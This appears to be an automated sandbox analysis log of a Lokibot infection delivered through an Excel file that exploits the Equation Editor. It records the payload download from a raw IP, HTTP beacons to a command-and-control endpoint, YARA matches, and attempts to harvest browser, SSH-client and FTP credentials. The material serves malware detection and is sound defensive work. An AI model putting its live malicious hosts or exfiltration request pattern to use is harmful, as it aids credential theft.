              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: vbc.exeString found in binary or memory: http://checkvim.com/ga14/fre.php
              Source: vbc.exe, 00000004.00000002.664629094.0000000002700000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: vbc.exe, 00000004.00000002.664629094.0000000002700000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
              Source: 89D14D5A.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
              Source: vbc.exe, vbc.exe, 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: unknownHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 176Connection: close
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89D14D5A.emfJump to behavior
              Source: unknownDNS traffic detected: queries for: checkvim.com
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00404ED4 recv,
              Source: global trafficHTTP traffic detected: GET /wdc/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.83.184Connection: Keep-Alive

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Office equation editor drops PE fileShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0040549C
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004029D4
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00222C24
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002256EC
              Source: C:\Users\Public\vbc.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\Public\vbc.exeCode function: String function: 00405B6F appears 42 times
              Source: C:\Users\Public\vbc.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
              Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
              Source: vbc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Original shipping documents.xlsxJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD190.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@4/15@142/2
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: 5}NC:\yasacogirig_reyeg56\zajotowuyavi\yezufemeloya.pdb source: vbc.exe, 00000004.00000000.448184731.0000000000418000.00000002.00020000.sdmp, vbc.exe.2.dr
              Source: Binary string: C:\yasacogirig_reyeg56\zajotowuyavi\yezufemeloya.pdb source: vbc.exe, 00000004.00000000.448184731.0000000000418000.00000002.00020000.sdmp, vbc.exe.2.dr

              Data Obfuscation:

              barindex
              Detected unpacking (overwrites its own PE header)Show sources
              Source: C:\Users\Public\vbc.exeUnpacked PE file: 4.2.vbc.exe.400000.1.unpack
              Detected unpacking (changes PE section rights)Show sources
              Source: C:\Users\Public\vbc.exeUnpacked PE file: 4.2.vbc.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.x:W;
              Yara detected aPLib compressed binaryShow sources
              Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1268, type: MEMORYSTR
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00402AC0 push eax; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00402AC0 push eax; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00222D10 push eax; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00222D10 push eax; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0092E4B7 push edi; retf
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0092E911 push E83768D8h; retf
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0092DABF push ebp; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0092AEFB push eax; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0092B7BA push es; ret
              Source: initial sampleStatic PE information: section name: .text entropy: 7.74250778335
              Source: initial sampleStatic PE information: section name: .text entropy: 7.74250778335
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)Jump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

              Boot Survival:

              barindex
              Drops PE files to the user root directoryShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2032Thread sleep time: -300000s >= -30000s
              Source: C:\Users\Public\vbc.exe TID: 2028Thread sleep time: -420000s >= -30000s
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: C:\Users\Public\vbc.exeThread delayed: delay time: 60000
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00402B7C GetProcessHeap,RtlAllocateHeap,
              Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0040317B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0022092B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00220D90 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002233CB mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00928E7B push dword ptr fs:[00000030h]
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: vbc.exe, 00000004.00000002.664494803.0000000000A00000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: vbc.exe, 00000004.00000002.664494803.0000000000A00000.00000002.00020000.sdmpBinary or memory string: !Progman
              Source: vbc.exe, 00000004.00000002.664494803.0000000000A00000.00000002.00020000.sdmpBinary or memory string: Program Manager<
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
              Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00406069 GetUserNameW,

              Stealing of Sensitive Information:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1268, type: MEMORYSTR
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
